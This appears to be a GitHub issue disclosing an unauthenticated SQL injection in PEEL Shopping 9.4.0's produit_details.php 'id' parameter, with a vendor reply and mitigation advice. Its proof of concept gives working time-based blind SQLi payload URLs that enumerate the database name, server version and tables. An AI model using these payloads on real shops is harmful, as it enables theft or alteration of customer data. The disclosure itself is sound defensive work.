Vulnerability Description: Public user/guest (unauthenticated) can inject malicious SQL query in order to affect the execution of predefined SQL commands via the "id" parameter on the "/peel-shopping_9_4_0/achat/produit_details.php?id=[SQLi]" endpoint. Upon successful of SQL injection attack, attacker can read sensitive data from the database or modify database data.
1) Assumed peel-shopping_9_4_0 out of box installation database name is peel. This query will check if database() name like hex(%peel%) - it will delay for 7 seconds before redirect to homepage (http://localhost/peel-shopping_9_4_0/) that indicates TRUE SQL statement which mean the database name like "peel".
3) By default, the database have a table name = peel_produits. This query will check if table_name peel_produits is exist, it will delay for 10 seconds if TRUE, else will redirect to homepage instantly.
Confidentiality: Since SQL databases generally hold sensitive data, loss of confidentiality is a frequent problem with SQL Injection vulnerabilities.
Integrity: Just as it may be possible to read sensitive information eg client/customer sensitive data, it is also possible to make changes or even delete this information with a SQL Injection attack.
Mitigation: Use of Prepared Statements (with Parameterized Queries). It would be good also to casting integer to ensure only numerical data is inserted in 'id' parameter eg - intval($_GET['id'])
cc @advisto
This was due to a change of structure to get product details, in order to potentially link it to a product API instead of reading data from MySQL.
The previously done protection was no more active, thus it was necessary to add an intval on the GET parameter.
Vulnerability Name: SQL Injection in "produit_details.php?id" parameter
Date of Discovery: 10 July 2021
Product version: 9.4.0 . Download link
Author: faisalfs10x
Vulnerability Description: Public user/guest (unauthenticated) can inject malicious SQL query in order to affect the execution of predefined SQL commands via the "id" parameter on the "/peel-shopping_9_4_0/achat/produit_details.php?id=[SQLi]" endpoint. Upon successful of SQL injection attack, attacker can read sensitive data from the database or modify database data.
Vulnerable URL: http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=[SQLi]
Proof of Concept:
1) Assumed peel-shopping_9_4_0 out of box installation database name is peel. This query will check if database() name like hex(%peel%) - it will delay for 7 seconds before redirect to homepage (http://localhost/peel-shopping_9_4_0/) that indicates TRUE SQL statement which mean the database name like "peel".
url : http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX)
[PoC enum db name]

2) Assumed the web is using MariaDB database server - check if db_version like hex(%MariaDB%), it will delay for 5 seconds if TRUE.
url : http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX)
[Poc enum MariaDB]

3) By default, the database have a table name = peel_produits. This query will check if table_name peel_produits is exist, it will delay for 10 seconds if TRUE, else will redirect to homepage instantly.
url : http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX)
[PoC enum table peel_produits]

To produce SQL syntax error, it is possible to intercept the request before it is redirect to homepage using a tool like BurpSuite (repeater).
Error syntax: http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELdECT(SLEEP(3-(IF(USER()+LIKE+0xGEN_ERROR,0,5)))))ERR)
[MariaDB disclosed image]

[peel_produits table_name disclosed]

Dump table name = peel_profil
Consequences:
Mitigation: Use of Prepared Statements (with Parameterized Queries). It would be good also to casting integer to ensure only numerical data is inserted in 'id' parameter eg - intval($_GET['id'])
cc @advisto
References for Mitigation Vulnerability: https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
The text was updated successfully, but these errors were encountered: